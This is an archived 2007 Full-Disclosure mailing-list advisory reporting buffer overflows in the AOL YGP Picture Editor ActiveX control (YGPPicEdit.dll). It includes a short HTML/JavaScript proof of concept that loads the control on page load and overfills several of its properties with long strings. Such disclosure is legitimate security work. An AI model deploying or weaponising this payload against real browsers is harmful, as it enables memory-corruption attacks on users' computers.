full-disclosure-uk December 2007 archive
Main Archive Page > Month Archives  > full-disclosure-uk archives
full-disclosure-uk: [Full-disclosure] AOL YGP Picture Editor YGP

[Full-disclosure] AOL YGP Picture Editor YGPPicEdit.dll Multiple Buffer Overflows

From: Elazar Broad <elazarb_at_nospam>
Date: Tue Dec 25 2007 - 23:29:52 GMT
To: "full-disclosure@lists.grok.org.uk" <full-disclosure@lists.grok.org.uk>


The AOL YGP Picture Editor Control(AIM PicEditor Control) version 9.5.1.8 suffers from multiple exploitable buffer overflows in various properties. This object is marked safe for scripting. I have not tested other versions. PoC as follows:


<!--
written by e.b.
-->

<html>
 <head>
  <script language="JavaScript" DEFER>
   function Check() {
    var s = 'A';

    while (s.length <= 8175) s = s + 'A'; obj.DisplayName = s; obj.DisplayName = s; obj.FinalSavePath = s; obj.ForceSaveTo = s; obj.HiddenControls = s; obj.InitialEditorScreen = s; obj.Locale = s; obj.Proxy = s; obj.UserAgent = s;

   }
  </script>

 </head>
 <body onload="JavaScript: return Check();"> <object id="obj" classid="clsid:085891E5-ED86-425F-8522-C10290FA8309"> </object> </body> </html> ----------------

Happy Holidays to all!

Elazar


Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/

   © Copyright 2012 Guardian Digital, Inc. All Rights Reserved.